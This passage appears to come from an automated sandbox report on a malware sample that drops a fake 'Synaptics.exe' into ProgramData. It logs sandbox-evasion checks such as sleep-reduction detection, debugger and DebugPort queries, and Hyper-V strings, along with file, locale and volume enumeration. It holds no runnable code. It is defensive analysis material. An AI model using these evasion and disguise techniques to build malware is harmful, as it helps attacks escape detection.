                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Contains functionality to detect sleep reduction / modifications
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00435BD42_2_00435BD4
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_00435BD45_2_00435BD4
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 6760Thread sleep count: 67 > 30Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 6760Thread sleep time: -4020000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_1-19243
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeAPI coverage: 6.2 %
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAPI coverage: 6.3 %
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_00435BD45_2_00435BD4
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile opened: PhysicalDrive0Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,2_2_00458EA4
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,5_2_00458EA4
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: _malloc,GetAdaptersInfo,_malloc,GetAdaptersInfo,1_2_00CE7A6A
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,__wcsicoll,StrStrIA,StrStrIA,StrStrIA,GetProcessHeap,GetProcessHeap,HeapFree,1_2_00C94B30
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CED4D5 _memset,GetLogicalDriveStringsW,GetDriveTypeW,_wcslen,1_2_00CED4D5
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.539102931.0000000002B6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW Area Connection* 7
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.539102931.0000000002B6A000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0040710E GetSystemInfo,0_2_0040710E
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_004099E0
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00406018
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00409B1C FindFirstFileA,GetLastError,0_2_00409B1C
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CEC3CD CharUpperW,_memset,FindFirstFileW,FindNextFileW,FindClose,1_2_00CEC3CD
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CE31FB PathFileExistsW,_wcslen,PathIsDirectoryW,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00CE31FB
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CDCF38 FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,1_2_00CDCF38
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,2_2_004099E0
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00409B1C FindFirstFileA,GetLastError,2_2_00409B1C
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_00406018
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,5_2_00406018
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,5_2_004099E0
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_00409B1C FindFirstFileA,GetLastError,5_2_00409B1C
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CA51B6 GetCurrentThreadId,TlsGetValue,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00CA51B6
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPortJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 10424Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00D063D8 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00D063D8
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C89CD0 GetCurrentThreadId,GetProcessHeap,OpenThread,OpenThread,GetLastError,GetProcessHeap,HeapFree,OutputDebugStringW,CloseHandle,1_2_00C89CD0
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C8A1D0 GetProcessHeap,GetProcessHeap,HeapFree,1_2_00C8A1D0
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00401EA8 LdrInitializeThunk,2_2_00401EA8
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00D063D8 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00D063D8
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00D0071A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00D0071A
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeProcess created: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe "C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 10424Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00473490 ShellExecuteEx,Sleep,WaitForSingleObject,2_2_00473490
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545731022.0000000067C25000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: gShell_traywnd*.*
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_004061D0
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: GetLocaleInfoA,GetACP,0_2_0040E088
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_004062DC
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: GetLocaleInfoA,0_2_0040C964
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: GetLocaleInfoA,0_2_0040C9B0
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: GetLocaleInfoA,0_2_00406AC8
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_00D13982
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,1_2_00D13439
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: GetLocaleInfoA,1_2_00D286E4
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,1_2_00D139BE
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_00D1391B
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_004061D0
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,GetACP,2_2_0040E088
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_004062DC
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,2_2_0040C964
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,2_2_0040C9B0
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,2_2_00406AC6
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,2_2_00406AC8
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_004061D0
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,GetACP,5_2_0040E088
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_004062DC
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,5_2_0040C964
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,5_2_0040C9B0
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,5_2_00406AC6
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,5_2_00406AC8
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{13133FC1-53AC-4d76-9495-26C72C627A86}.tmp VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{89EF94DE-BCBD-48c8-9D05-DD67B97A97CF}.tmp VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{015C9CAB-6DBA-41fc-A3C2-F3AA63E08B53}.tmp VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
